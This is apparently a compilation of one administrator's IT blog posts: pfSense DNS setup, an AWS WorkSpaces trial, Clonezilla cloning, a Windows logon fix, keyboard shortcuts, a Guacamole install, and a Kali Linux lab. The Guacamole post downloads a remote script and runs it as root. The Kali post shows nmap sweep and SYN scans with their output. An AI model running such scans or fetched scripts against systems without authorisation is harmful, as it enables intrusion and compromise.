How to setup PFSense with the new Secure and Private CloudFlare 1.1.1.1 DNS

How to setup pfSense with free Secure and Private DNS

You’re probably aware by now that Cloudflare and APNIC has begun to provide secure and private DNS – DNS over HTTPS (DOH), to the general public. You can learn more and read about the initiative here. This article will give a brief summary of why this is important, and how to configure your pfSense router to use these new addresses and disseminate them to your network clients.

By default, your Internet Service Provider (ISP) will provide your router with it’s own list of DNS server IP addresses when you first connect your device to the internet. DNS is used to find websites, and essentially only translates IP addresses to domain names and vice-versa. However, these DNS IP addresses provided by your ISP may also be running on servers that nefariously log and record your internet browsing history. In some cases, these servers may go so far as to even inject advertisements into your web browser whether or not you’d like to see those ads.

By changing your router and/or computer to use 1.1.1.1 or 1.0.0.1 as it’s DNS resolver, you bypass your ISP’s DNS servers, and get a secure and private response from Cloudflare. Cloudflare has a configuration page guide for IOS, Android, MacOS, Windows, Linux, and a Router here. Follow the procedure below on how to setup a pfSense firewall/router to use DNS for it’s queries, as well as set your pfSense’s DHCP Server service to broadcast the new DNS IP addresses to your network clients.

  1. Login to your pfSense firewall by pointing your web browser of choice to the login page (usually this is your Default Gateway IP Address).
  2. At the Status / Dashboard page, in the upper left-hand menu, click System > General Setup
  3. Next, under DNS Server Settings, change the DNS servers in the first two fields to 1.1.1.1 and 1.0.0.1 respectively. Optionally, you can add 8.8.8.8 as a third IP address to use Google DNS in the event that the CloudFlare servers are unavailable, or are taken down by the government. It’s also a good idea to uncheck “Allow DNS server list override”. Once these changes have been made, scroll to the bottom of the page and hit Save
  4. Next, if our pfSense is also being used as a DHCP server, we also want our clients to get these IP addresses for their DNS server settings. To do so, at the top of the pfSense settings menu, click Services > DHCP Server
  5. In the DHCP Server settings, scroll down to Servers, and edit the DNS servers to contain the two new cloudflare DNS servers, (1.1.1.1 and 1.0.0.1), as well as Google’s 8.8.8.8, if desired. Next, scroll to the bottom of the page and hit Save.
  6. Now would be a good time to restart your client computers to pick up the new IP address settings. You can confirm your computers have received the new IP addresses by opening a command prompt and issue the command:
  7. ipconfig /all | more

    This will give you something like the following information:

  8. As you can see our client has recieved the correct IP address from our pfSense DHCP server.
  9. To confirm our computer is actually getting it’s DNS queries from CloudFlare (1.1.1.1), we can issue a new command in the command prompt:
    nslookup www.facebook.com

    And we can find in our results that the responding server is named 1dot1dot1dot1.cloudflare-dns.com, and it’s address is 1.1.1.1:

In order to test that your DNS queries are indeed secure, you can use the link posted by John in the comments; thanks, John!

 

Amazon Workspaces – Overview, Proof of Concept, and Pricing

Overview and Whitepaper:

Using the AWS Management Console, you can deploy high-quality cloud desktops for any number of users.

Strategies and Challenges for IT who deploy desktops (whitepaper):

Strategy challenges:

  • Timely employee request fulfillment
  • Supporting contractors and temporary staff with a productive workspace
  • Merger and acquisition assistance
  • Increased application development and engineering activity
  • Provide and manage temporary desktops

Greatest Challenges:

  • Security of endpoints
  • Threat Detection/Prevention
  • Corporate file access and protection
  • Improve collaboration
  • Maintain compliance
  • Complexity of technology
  • Managing a heterogeneous device environment
  • SSO to corporate apps
  • Rogue employee devices
  • Rogue applications housing corporate data
  • Supporting LOBs and executive devices and apps

On Premises Virtual Desktop Infrastructure (For example building Terminal Server VDI’s or Citrix)

Upsides to On Premises Virtual Desktop Infrastructure:

  • Simplified management, centralized, hosted, managed, executed
  • Efficient provisioning and de-provisioning with standardized images allowing quick revoking of access
  • Centralized image management, proactive detection, rapid quarantine of suspicious behavior

Downsides to VDI:

  • Complex infrastructure that is difficult for IT to plan, configure, manage, and maintain.
  • Unfavorable economics that tip ROI equation in the wrong direction with un-utilized capacity, heavy upfront costs and cumbersome ops.
  • Unpredictable global access based on proximity of users due to low network bandwidth and unacceptable latency
  • Time-consuming implementations that involve multiple IT disciplines and months of planning, testing, and staging of infrastructure.
  • Difficult root cause analysis among multiple IT teams.

Amazon Workspaces Desktop as a Service a Viable alternative to VDI (Hosted Desktop Service)

Employee Benefits:

  • Employees not tethered to traditional desktops or laptops.
  • No cumbersome VPN connections
  • Increased collaboration and communication with simplified virtual workspaces

Business Benefits:

  • Rapid scale up or down; new employees, mergers and acquisitions, global growth
  • Integrate, consolidate, and deliver services and apps
  • Reduce capital expenditures, operational costs and streamline IT maintenance and infrastructure management

IT Benefits

  • Ability to meet security policy requirements and compliance standards by using protocols to compress, encrypt, and encode data so only images are transmitted and data no longer resides on local devices.
  • Enables creation of developer-style environments, granting developers quick an secure access to end-user environments for seamless dev testing, without impeding user productivity.
  • Allows devs to move fast and fail fast with access to desktop resources when they need them.
  • Keeps business data secure, centrally managed, and accessible to users.
  • Places productive workspace in the hands of end-users near instantaneously, while supporting secure access from multiple device types.
  • Manages apps centrally with the ability to securely package, deploy, and maintain a productive user environment.
  • Deliver a productive environment for users without the task of configuring a desktop asset.

Proof of Concept 

*Note, our org already has a VPN connection between Amazon AWS and our On-Prem domain and domain controllers. This allows me to find our domain with Amazon’s connector. Review the Architectural Diagram below to ensure you’re comfortable with how Workspaces can fit into your AWS presence and VPC’s.

  1. Log into AWS, > Workspaces > Get started
  2. Create AD connector (use Administrator account to connect) – also add WorkDocs Sync feature
  3. Create New Workspace > Choose Directory (local.domain.com) > search for user > jcoltrin (username: domain\jcoltrin) > add selected > Next > Select: Standard with Windows 7 (later I will add MS volume license for Office and other applications and then create an image.)
  4. I choose Performance: 2 vCPU, 7.5 GiB Memory – Hourly
  5. Download the Workspaces client here: https://clients.amazonworkspaces.com/

I sent myself the connection email which looks like the following:

————————-

Dear Jason,

A new Amazon WorkSpace has been provided for you. Follow the steps below to quickly get up and running with your WorkSpace:

1. Download and install a WorkSpaces Client for your favorite devices:

https://clients.amazonworkspaces.com/

2. Launch the client and enter the following registration code: XXxxXX+xxXXxx

3. Login with your Network/Domain password. Your username is jcoltrin

If you have any issues connecting to your WorkSpace, please contact your administrator.

Sincerely,

Amazon WorkSpaces

————————–

After verifying the registration code, log into the new virtual workspace with your domain credentials:

After logging in you may receive the following notice if resuming the workspace:

After logging in I received the following desktop:

Notice the following in the desktop image:

  • Network Drives mapped
  • Local and Remote Printers are created
  • Corporate desktop background
  • The computer is now a member of the domain with the computer name IP-AC1F5261
  • Icons available for AWS applications and Directory Sync (share files with my local workstation)

Finalizing for Production and Production Notes:

  • Finalize image with all necessary applications and test. Build your gold Images
  • Enlist a user to test running the workspace in production and adjust applications/workspace as necessary
  • Deploy to a set of users.
  • Rent before buy, buy before build.
  • Aligned with cloud technology
  • Builds on existing AWS infrastructure
  • Straightforward architecture
  • Give it to users and see how they like it
  • Multi-Region vs Single Region – within each region are availability zones. One workspace is not available in all regions. When building VPC, figure out which subnets support workspaces.
  • Subnets are fixed, build to allow for growth.
  • Workspaces are attached to AD connectors. You cannot move an old Workspace between AD Connectors. If availability zone becomes unavailable, then workspaces are unavailable. Use multiple availability zones to allow for this.
  • Only allow windows devices with certificates to connect. Etc. You’re going to have several AD connectors. Have a production AD connector and a testing AD Connector. Setup pure sandbox somewhere else for testing.
  • Each AD connector drops the computer into single OU, options are separate AD connector per department. Eg. Only accounting can connect from a certain dept. Or you cannot auth from outside, only on-prem. Create AD connector for consultants which drop them into separate subnet, monitoring.
  • Workspaces IP addresses stay there forever. IP addresses persist on rebuild etc. Cannot assign IP’s.
  • One VPC for workspaces.
  • Better segregation between work and personal side of things. BYOD is nice – pane of glass. Devs have good separation.
  • This gets Windows on Mac better than bootcamp
  • Reduced operational overhead, light-weight devices, drop them in mail ready to go. Send the registration code. People are lining up to get onboard. Tougher to please users are ecstatic about workspaces. Once implemented, IT itself will not go back to before.
  • Run pilots.
  • Replace end-of-life desktops
  • Great for Mergers and acquisitions
  • Users could connect with Zero client at the office and Home computer at home
  • Allow deployment of Zero clients in all facilities and retrofits
  • Hoteling/shared workspace areas. Smaller sites only need internet connectivity, not a WAN-enabled site.
  • Scalable and global
  • No upfront CapEx
  • Capacity-on-demand
  • Rate of innovation – customers drive features at Amazon
  • Instrumentation and controls – complexity and cost of on-prem is daunting
  • Cost savings – financial benefits – get out of the business of providing physical PC’s, building and configuring VDI service is complicated and costly, focus on service not infrastructure.
  • Workspaces API & CLI integration
  • Same image/applications leverage multiple Geos, ability to grow into other areas
  • Having desktop in cloud allows patch compliant capacities
  • Enabling support staff opportunities – support users all over world, help desk reps
  • Enable end users – automate the whole thing & allow user to migrate their data.

Pricing:

https://aws.amazon.com/workspaces/pricing/

https://aws.amazon.com/directoryservice/pricing/

There are two main options for Workspaces, Monthly pricing and Hourly Pricing.

At 160 hours per month, a “Performance-grade” workspace under the Hourly Pricing model would cost $7.25 + $0.57/hour = $98.45.

The same “Performance-Grade” workspace under the “Monthly” pricing would cost $55.

$55 x 12 months = $660

A new Dell 7050 PC typically costs $800

So it would take approximately 1 1/2 years of monthly payments to reach the cost of a normal desktop PC.

Hardware Options

Value Root Volume User Volume Monthly Pricing Hourly Pricing
1 vCPU, 2 GiB Memory 80 GB 10 GB $25 $7.25/month + $0.22/hour
1 vCPU, 2 GiB Memory 80 GB 50 GB $28 $9.75/month + $0.22/hour
1 vCPU, 2 GiB Memory 80 GB 100 GB $31 $13/month + $0.22/hour
1 vCPU, 2 GiB Memory 175 GB 100 GB $36 $19/month + $0.22/hour
Standard Root Volume User Volume Monthly Pricing Hourly Pricing
2 vCPU, 4 GiB Memory 80 GB 10 GB $33 $7.25/month + $0.30/hour
2 vCPU, 4 GiB Memory 80 GB 50 GB $35 $9.75/month + $0.30/hour
2 vCPU, 4 GiB Memory 80 GB 100 GB $38 $13/month + $0.30/hour
2 vCPU, 4 GiB Memory 175 GB 100 GB $44 $19/month + $0.30/hour
Performance Root Volume User Volume Monthly Pricing Hourly Pricing
2 vCPU, 7.5 GiB Memory 80 GB 10 GB $55 $7.25/month + $0.57/hour
2 vCPU, 7.5 GiB Memory 80 GB 50 GB $57 $9.75/month + $0.57/hour
2 vCPU, 7.5 GiB Memory 80 GB 100 GB $60 $13/month + $0.57/hour
2 vCPU, 7.5 GiB Memory 175 GB 100 GB $66 $19/month + $0.57/hour
Power Root Volume User Volume Monthly Pricing Hourly Pricing
4 vCPU, 16 GiB Memory 80 GB 10 GB $70 $7.25/month + $0.68/hour
4 vCPU, 16 GiB Memory 80 GB 50 GB $72 $9.75/month + $0.68/hour
4 vCPU, 16 GiB Memory 80 GB 100 GB $74 $13/month + $0.68/hour
4 vCPU, 16 GiB Memory 175 GB 100 GB $78 $19/month + $0.68/hour
Graphics Root Volume User Volume Monthly Pricing Hourly Pricing
8 vCPU, 15 GiB Memory, 1 GPU, 4 GiB Video Memory 100 GB 100 GB $22/month + $1.75/hour
Additional Storage $0.10/GB

Conclusion

Overall, I really like Workspaces, it was simple to setup and run. I believe the remote workspace from AWS can work very well for the enterprise and provides a flexibility to expand, create different images for different users easily and keep  data safe at AWS by only sending graphics/pixels over the wire. People can use their own BYOD devices such as Chromebooks etc. to perform their jobs.

The only drawback I’ve encountered is workspaces does not provide a pass-through video / camera devices for Skype video calls. If a user needs to use Skype or other video conferencing, they will have to start their call “outside” of Workspaces.

Let me know what you think about the product and this write-up.

How to clone a Dell Optiplex 7050 M.2 NVME Hard Drive with Clonezilla and an External USB HDD

I ran into trouble when trying to clone a new Optiplex 7050. My normal procedure for cloning with clonezilla required a little tweaking to accommodate Windows 10, UEFI, NVME M.2, Secure Boot, and RAID On. Follow the procedure below to clone your systems on these newer hard drives and BIOS versions.

As a side thought, I enjoy using Clonezilla and have used it for many years. I love the convenience of it and not having to manage Windows images with something like SCCM. While SCCM has a place in some organizations, I believe it’s perfectly fine to use Clonezilla to create OS images of different models of computers. I have approx 15 different OS images; everything from Lenovo laptops to Dell Optiplex 380’s to Optiplex 7050’s.

Requirements:

  • 1 x USB 2.0 or 3.0 USB thumb drive min 2GB capacity for the clonezilla bootable USB drive made bootable to 20170905-zesty version of clonezilla
  • 1 x USB 3.0 USB External HDD with a minimum HDD size that is larger than the TOTAL size of your M.2 NVME HDD. (I use a 4 TB Western Digital My Passport) – In my previous experience with Clonezilla, it has created images only writing images of the Used Space on the Source HDD, in this case with UEFI / NVME HDD’s, the image created on disk is the total size of the NVME drive.
  • 2 x Dell Optiplex 7050 (Source and Target) computers
  • 1 x Separate PC or laptop you can use to create a bootable USB Clonezilla Thumb Drive

1. Configure your Source Windows 10 Dell Optiplex 7050 machine as necessary. Install all applications, create user accounts, and uninstall bloatware. Make sure you create an administrator user account and password. In final preparation for cloning, either run Sysprep (found in C:\Windows\System32\Sysprep), or alternatively ensure you shut down Windows 10 completely by creating a Shutdown /s /t 0 shortcut and executing it.

2. On a separate PC, download Rufus which we’ll use to create a bootable USB thumb drive.

3. On a separate PC, download the AMD64 version of alternative (Ubuntu-based) as outlined on the Clonezilla website (this version is required for newer BIOS’):

4. Change the file type to ISO and hit Download.

5. Attach your USB thumb drive into your separate computer, run Rufus, tell Rufus to use the drive you just attached under Device, point Rufus ” to the .iso file you just downloaded.

6. Hit Start and the bootable USB thumb drive with Clonezilla will be created.

7. On the Source computer, insert the USB thumb drive into one of the front panel’s top (black) USB ports, and insert the USB External HDD separately into the Blue USB 3.0 port. Attach the keyboard, mouse, power, and monitor.

8. Power on the Source computer and start mashing the F12 key on the keyboard to get to the one-time boot menu.

9. Before we begin, we need to make sure clonezilla can find our NVME HDD. By default UEFI and Secure Boot will be enabled. We need to disable these as well as Boot Path Security so that we can continue.

10. Select Setup from the Boot Menu:

11. In the BIOS, under the General Heading, select UEFI Boot Path Security and change it from Always to Never.

12. Next change System Configuration > SATA Operation from RAID On to AHCI

13. Lastly, change Secure Boot > Secure Boot Enable “Enabled” to “Disabled”

Apply, Save and Exit the BIOS. On the next boot, start mashing the F12 key again and this time select UEFI: USB DISK 2.0 PMAP

Clonezilla will boot from the USB drive so choose the default (hit Enter):

Select English > Don’t touch keymap > Start Clonezilla > device-image (Ok)

Under Mount Clonezilla image directory, choose Local_dev (Ok)

Press Enter to continue.

Review the clonezilla Scan disk preview to ensure it’s found both your Source and Target hard drives:

Press Ctrl-C to continue.

Arrow down and select your large external USB hard drive (sda1) to set the location of /home/partimg . This is where the clone image will be stored.

In the Directory Browser, hit “Browse” and go to your Parent Directory (top-most level) and select Done. This is where your image will be saved. You can see in my screenshot I’ve already saved an image here.

You will get a Summary location of Source (dev/sda1) and Target (/home/partimag). Press Enter to continue.

Choose Beginner mode

Choose Save Disk (Save_local_disk_as_an_image) – in my previous experience with Clonezilla, using normal spinning HDD’s and even SSD’s, I’ve used Samba to save my images to a separate server over the network using gigabit ethernet perfectly fine. However, in the case of these new computers and hard drives, I would get a permissions error when selecting SAMBA/SMB 2.1. The imaging would begin to take place and a couple smaller partitions would copy, but as soon as the primary large partition started it’s copy, I would get the permission error and the clone would halt. This is why we are using a local external USB hard drive.

Give a descriptive name for the image (Dell7050_NVME_256GB_DATE-IMG) hit OK.

Select the local disk as source (should only be one here)

Select -sfsck (Skip Checking)

Select Yes, check the saved image

Select -senc Not to encrypt the image (or encrypt if desired)

Select Action to perform when everything is finished: -p power off.

Press Enter to continue, (Yes/Yes) – the image process will run and the image of the Source PC will be written to the External USB HDD. The machine should shut down when complete.

Image Target Computer

Now that we have our image saved on our external HDD, we can image our Target PC. On the powered-off PC, Connect the USB thumbdrive, External HDD, keyboard, mouse, and monitor, and again Boot into the BIOS.

On the new target computer, we want to again change the BIOS settings to mirror those we made in steps 11., 12., and 13.

After saving the BIOS, restart and hit F12 again, select the USB thumb drive, and boot Clonezilla.

Start Clonezilla > Device Image > Local_dev > select image repository (sda1) > in Directory Browser, browse to the image we created, highlight it and select Done:

Choose Beginner Mode > Restore Disk:

Choose the image to restore:

Select the target disk to restore onto (Should only be one listed here):

Select “Skip checking the image before restoring” > poweroff > Enter >

Heed the warning here. If important data is on the target disk, do not proceed. All data will be overwritten:

Hit y (enter) > y (enter) >

Partclone will run, clone the image to your disk, then shut down:

With the system powered down, remove your external HDD and boot thumb drive.

Power on the newly-imaged PC, hit the F12 button to go into the BIOS again. Reverse the changes made in steps 11, 12, and 13. Save the BIOS settings, and boot normally into windows. Congrats, you’re done! Hope this helps someone clone their newer systems with Clonezilla.

Solved – Dell Latitude 7370 cannot login to domain – No Logon Servers available

Solved – Windows 7 – WiFi login: There are currently no logon servers available to process your logon request.

I had an associate drop a Dell Latitude 7370 laptop on my desk saying he cannot print. I found that the user is able to logon to local workstation desktop using cached credentials but cannot logon to the domain. He is only logging into the laptop with his cached credentials, is not authenticating with the domain, and therefore cannot print. Logging off of the user’s account, and then trying to login as myself I get the error:

“There are currently no logon servers available to process your logon request. “

I log in with his cached credentials again and right-click on the wifi adapter and choose Troubleshoot but can’t find any problems. I occasionally and intermittently get the “Windows needs your current credentials” Pop-up notification in the lower right near the clock/systray but clicking on that icon does not do anything. I even set the Wireless network adapter properties for TCP/IP 4 to use the DNS IP Address of the domain controller explicitly instead of getting the setting from DHCP, but still, the laptop is unable to login to the network with the new domain password I set for the user’s account.

There is definitely something wrong with the wireless adapter. I notice that when disconnecting/reconnecting to the wireless SSID, that the Intel WiFi drivers pop up stating that I’m connected and that there is a signal strength. Knowing that Intel drivers sometimes try to do too much and interfere with wireless connections I do the following and fix the issue.

  1. Uninstalled Intel wifi driver package from Windows Control Panel > Programs and Features. (I uninstalled both the WiDi package as well as the Intel Wifi Drivers package). This removed the device from the Device Manager
  2. In device manager, right-click on the Network Adapters and choose “Scan for Hardware Changes.” This, in turn, finds the WiFi network adapter but it does not have drivers yet.
  3. Go to https://support.dell.com and type in the Service Tag, find the drivers section and download the following driver: Intel-8260-7265-3165-7260-WiFi-Driver_YM1PH_WIN_20.10.1.1190_A24.exe
  4. Run the .exe and when it asks if I want to install the driver or extract, I chose Extract only. I make a new folder under the root of my C: drive and finish the extraction. 
  5. Back in the Device Manager, Right-click on the WiFi adapter and choose to “Browse my computer for driver software”. 
  6. Point to the location of the extracted drivers, finish the installation and log off. The laptop can now find the logon server/domain controller and the user is back in business.

For some reason the full suite driver for this model of laptop interferes with DNS and the laptop cannot find the logon server and login to the domain. By extracting the drivers only and telling the device manager to use only the .inf files for the device, we can circumvent the driver suite and get our adapter talking to the domain controller for authentication.

Windows 10 Creators Edition New Keyboard Shortcuts

Some new Windows Keyboard Shortcuts in Windows 10

With the release of Windows 10 Creators Edition version 1709, comes more bells, whistles, tricks, and shortcuts for us to dig into and explore. In this article, we’ll look mostly at the Windows Key shortcuts available and how the shortcuts and key combos can help us in our daily workflow.

  1. In the event you’re not already aware, the Windows Key on your keyboard (usually between the Ctrl and the Alt keys in the lower left area of most keyboards) has a lots of capabilities when held down while pressing other keys on the keyboard. Pressing this key on it’s own launches the Start Menu:
  2. Windows Key + A – Brings up the Windows Notifications SideBar. Here we can find existing notifications, switch to tablet mode, get into the windows settings panel, join a WiFi network, and change our location settings.           
  3. Windows Key + B – Select / Activate the Systray / Show Hidden Icons Expansion menu. This can come in handy as a few applications run as services and can only be accessed by right-clicking on the icon in the Systray; if your mouse stops working, this is a good shortcut to know.         
  4. Windows Key + C – Opens Cortana in Listening Mode. “Hey Cortana!” This is disabled by default and can be activated in the Cortana Settings. (Enable in Cortana > Menu > Notebook                                    
  5. Windows Key + D – Show the desktop
  6. Windows Key + E – Open File Explorer
  7. Windows Key + F – Open the Feedback Hub and Take a screenshot (this didn’t work for me)
  8. Windows Key + G – Open the X-Box Game Bar
  9. Windows Key + H – Open the Dictation control bar 
  10. Windows Key + I – Opens the Windows 10 Settings
  11. Windows Key + J – Sets focus to Windows Tips when one is available (Turn off tips in Settings > Notifications & Actions) 
  12. Windows Key + K – Open the Connect Quick action (connect to a wireless projector)                                            
  13. Windows Key + L – Lock your PC or Switch Accounts
  14. Windows Key + M – Minimize all windows
  15. Windows Key + O – Lock the device orientation (helpful for tablets)
  16. Windows Key + P – Choose a presentation display mode (Sidebar Projectors tool) 
  17. Windows Key + Q – Quick file search
  18. Windows Key + R – Open Run dialog box
  19. Windows Key + S – Open Windows Search (same as Windows Key + Q)
  20. Windows Key + T – Cycle through apps pinned to the taskbar (cycle in reverse is Windows Key + Shift + T)
  21. Windows Key + U – Open Ease of Access Center
  22. Windows Key + V – Cycle through windows notifications
  23. Windows Key + W – Opens the Windows Ink Workspace
  24. Windows Key + X – Opens the Quick Links Menu (right-click on the start menu) 
  25. Windows Key + Y – Switch input between Windows Mixed Reality and desktop (Your PC may not meet the minimum specs for Windows Mixed Reality)
  26. Windows Key + Z – Shows menus or commands available when an app is in full-screen mode.
  27. Windows Logo Key + period (.) or semicolon (;) – Opens the Windows 10 Emoji control panel đź‘Ť                                                 
  28. Windows Key + Comma (,) – temporarily peek at the desktop
  29. Windows Key + Pause/Break – Opens the System Properties
  30. Windows Key + Ctrl + F – Search for Active Directory computers on a network
  31. Windows Key + Number/Shift/Ctrl/Alt – Manage TaskView Virtual Desktops

I’m sure there are more so let me know in the comments if I missed any and let us know which are your favorites (mine is Windows Key + Pause/Break)

Setup Guacamole Remote Desktop Gateway on Ubuntu with one script

How to replace RDP, SSH and TeamViewer with free open source web-based client-less remote desktop gateway.

I recently learned about Guacamole and found that the setup is quite easy. I had been looking for a way to access all of my virtual and physical machine desktops remotely but didn’t want to rely upon, or trust TeamViewer eternally. Guacamole is open source software that provides you a way to run a tomcat/apache/mysql server suite that sets up and connects remote desktop connections via a web browser very similar to Teamviewer. It allows you to connect to any number of different desktops with just an html5 web browser, and a single open port on your firewall. You can use Google Authenticator 2FA to log into a console that has access to all your desktops, without having to install or configure remote clients such as putty, RDP and VPN. Although, if you’re attempting to use VNC, there will be some initial configuration of the VNC server on the client side – I found that UltraVNC server works best with Guacamole, more on that later.

The installation documentation on the official site is comprehensive but I was able to set up the system fast thanks to Chase Wright’s post here. To be clear, this is not “my script”, but I’ve written this article as a tutorial/guide.

First, you’ll want a standard Ubuntu server or virtual machine installed and running. I installed guacamole on Ubuntu Server 16.10 LTS.

Second, open an ssh connection to your server and run the following commands:

sudo su -
wget https://raw.githubusercontent.com/MysticRyuujin/guac-install/master/guac-install.sh
chmod +x guac-install.sh
./guac-install.sh

The installation will take a little while to download and install, and should only prompt you to provide a mysql database password.

For me, that was pretty much it for the initial setup. Next, I went to a different computer and connected to the guacamole gateway at the following default website:

http://serverIPaddress:8080/guacamole (replace serverIPaddress with your ubuntu server’s IP)

Login with the default guacamole username/password: guacadmin/guacadmin

The initial interface is a little sparse, but to create an RDP connection do the following:

  1. Create a new user first before you create a connection because, by default, it will launch a desktop session the next time you log in. If there’s a problem with the connection you may get stuck. This happened to me and I was stuck on the error:
    “Connection Error: An internal error with Guacamole server, and the connection has been terminated”

    It took a little digging but essentially the server console is up and running, but it is hidden by the black screen/pop-up and you can get back into the settings by going to the url: http://serverIPaddress:8080/guacamole/#/settings/sessions

  2. Create the user first by going to the menu in the upper right-hand corner and choose Settings:
  3.  
  4. Next, click the Users tab and then New User:
  5. Next, provide a username, password (x2), and give this new user all permissions and hit save at the bottom:
  6. With this new user created, you will now want to log in as this new user and change the guacadmin account password.
  7. Now we can create our first connection. Before you create your first RDP connection, be sure to test RDP account credentials from a different computer to ensure you can connect successfully.
  8. Click on the Connections tab and then New Connection. The only things I had to set up to get to my workstation RDP connection working were the following:            
  9.  
  10. Hit Save at the bottom. There are many additional settings available but this should get you up and connected.
  11. Now we want to assign this connection to a user. Do that by going into the Users tab again, find the user you want to assign and the connection:
  12. Now go to a different computer from the one you want to connect to, go to http://serverIPaddress:8080/guacamole site, login as the user with the connection assigned to it and you should be greeted with the RDP console of the remote computer.
  13. To setup an ssh connection it’s even easier. Again, first create a new user with the same name as the ssh server you want to connect into (I named my user HN-DHCP01). Then create a new connection and name it the same as your server. Below are the guacamole ssh connection settings I used to connect to my DHCP01 server:
  14. Under the Authentication setting, provide a valid ssh user’s credentials on the server you’ll be connecting into.
  15. Hit save at the bottom. Go back into the User tab, then select the new user (HN-DHCP01 user) and assign the connection to the user at the bottom and hit save.
  16. Log out of guacamole, then log in as the new user (HN-DHCP01) this will instantly log you into an ssh session that you can see in the screenshot below runs right in the browser!
  17. Guacamole also supports Two-Factor Authentication as well as a multitude of additional setups and configurations. It’s wise to setup 2FA prior to opening any firewall ports into your local network from the internet, as well as make sure that you follow all security precautions and test everything thoroughly.
  18. When configuring VNC for use as a remote support with Guacamole, I’ve found UltraVNC Server works best for Windows Clients. It’s a little tricky to setup on the client side and get it to run consistently across all flavors of Windows 7, and Windows 10 feature releases. 
  19. Enjoy your guacamole and let me know in the comments if I’ve missed anything.

Installing Kali Linux on ProxMox – Building a Penetration Test Lab – Part 2

In the process of building a Penetration Test Lab, I wanted to get started with the installation of Kali Linux virtual machine running on ProxMox. To get started, first download the latest version of Kali Linux (ISO) here. Grab the version

Kali 64 bit ISO | Torrent 2.6G 2017.1

Build your new VM (Proxmox > Create VM) using the ISO you’ve downloaded.

According to other user’s accounts of Kali not working after installation, it’s recommended to change the display type to VMWare compatible: After building the VM, change Hardware > Display > Edit > Choose VMWare compatible:

Kali installs onto a virtual hard drive on ProxMox (we will not be running a “live” version of Kali.) Start the new VM and scroll down the menu and choose Install  – (not GUI install.)

During installation, when grub asks where to have grub installed, choose “select your own location.”
Manually enter the path: /dev/sda
Otherwise, if you choose the ‘default’ or the path already listed, after completing the installation and a restart, you’ll get a message “Booting from Hard Disk” and the boot sequence will not complete, the VM will essentially hang.

Kali has completed its setup, I’ve booted the Kali VM, I’ve logged in, and I’m on the desktop.

Run apt-get update and apt-get upgrade to update the packages on your system.

Before we go on to complete the setup of the rest of our lab with known-vulnerable hosts, let’s run some cursory nmap scans.

Let’s run a ping scan on our own network with the command:

nmap -v -sn 10.0.10.0/24

This says: nmap, print verbose output (-v), do a Ping Scan (-sn) – (disable the default port scan for each address), and use the network 10.0.10.0 with a CIDR of /24.

This scan will attempt to ping all 254 addresses. The highlights of the scan are below:

root@HN-kali01:~# nmap -v -sn 10.0.10.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-04 15:13 PDT
Initiating ARP Ping Scan at 15:13
Scanning 255 hosts [1 port/host]
Completed ARP Ping Scan at 15:13, 1.95s elapsed (255 total hosts)
Initiating Parallel DNS resolution of 255 hosts. at 15:13
Completed Parallel DNS resolution of 255 hosts. at 15:13, 5.53s elapsed
Nmap scan report for 10.0.10.0 [host down]
Nmap scan report for pfSense2x.jasoncoltrin.local (10.0.10.1)
Host is up (0.00048s latency).
MAC Address: 62:65:B1:30:52:A7 (Unknown)
Nmap scan report for 10.0.10.2 [host down]
Nmap scan report for 10.0.10.3 [host down]

...
...
Nmap scan report for 10.0.10.51
Host is up (0.00049s latency).
MAC Address: 18:03:73:34:34:36 (Dell)
Nmap scan report for 10.0.10.52 [host down]
Nmap scan report for 10.0.10.53 [host down]

So here we see that the scan detected my pfSense virtual machine firewall on IP 10.0.10.1, and gave me the MAC Address.

Let’s take a closer look at my the Dell workstation found on 10.0.10.51. To do so, let’s run a port scan:

nmap -p 1-65535 -sV -sS -T4 10.0.10.51

This scan does the following:

Run a full port scan on ports 1-65535, detect service versions, run a Stealth Syn scan, use T4 timing and the target of the scan is IP 10.0.10.51.

Below are the results:

root@HN-kali01:~# nmap -p 1-65535 -sV -sS -T4 10.0.10.51

Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-04 15:17 PDT
Nmap scan report for 10.0.10.51
Host is up (0.00047s latency).
Not shown: 65528 filtered ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
2179/tcp  open  vmrdp?
27036/tcp open  ssl/steam    Valve Steam In-Home Streaming service (TLSv1.2 PSK)
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 18:03:73:34:34:36 (Dell)
Service Info: Host: JCDESKTOP; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.84 seconds

Because I don’t always like to use my new Kali VM via the ProxMox console, I want to run my Kali desktop over VNC & SSH. Here is a good resource for learning how to connect to your Kali Linux system with VNC over a secure SSH connection:

In the next post, we’ll look some more at NMAP, as well as some other pen-test tools.

Security – Blue Team – Building a security project on a budget

How to Create and Build a Security Profile for Your Network on a Budget – Part 1

Start with Building a Foundation (or use an existing good one).

Credit to Kyle Bubp & irongeek.com: http://www.irongeek.com/i.php?page=videos/bsidescleveland2017/bsides-cleveland-102-blue-teamin-on-a-budget-of-zero-kyle-bubp

Use a Base Framework for your security project. There are a lot of standards available and the NIST government standards are a good solid foundation:

  • NIST 800-53
  • NIST Cybersecurity Framework
  • NIST CSF Tool
  • CIS Critical Security Controls
  • NIST-CSF tool – this is a nice visual tool – graphical interface for the stages of building a security program

Document everything

A core documentation repository is critical when setting up a security project – others will follow you and will need to look up the information you have recorded. It’s best to have a security incident response ticketing system and documentation before you need it. Have these tools up and ready.

For policy, procedure, how-tos, etc:

  • MediaWiki(free)
  • Atlassian Confluence ($10 for 10 users) – glyfee plugin for confluence
  • OneNote/SharePoint – not every company is entirely open source

Incident Response Ticketing/Documentation systems:

Map out your entire network

  • NetDB – Uses ARP tables and MAC databases on your network gear. (use a service account and NetDB will use ssh/telnet to find every device connected, will give a nice http interface. You can setup a cron job that will scan NetDB database every hour. You can pipe new device connections to an email address. Knowing if something comes onto your network is critical.

.ova is available at https://www.kylebubp.com/files/netdb.ova

Supports the following: Cisco, Palo Alto, JunoOS, Aruba, Dell Powerconnect

  • nmap scans + ndiff/yandiff – not just for red teams; export results, diff for changes. Alert if something changed.
  • NetDisco

https://sourceforge.net/projects/netdisco – uses SNMP to inventory your network devices.

  • Map your network – create a Visio document and have a good network map.

Visibility

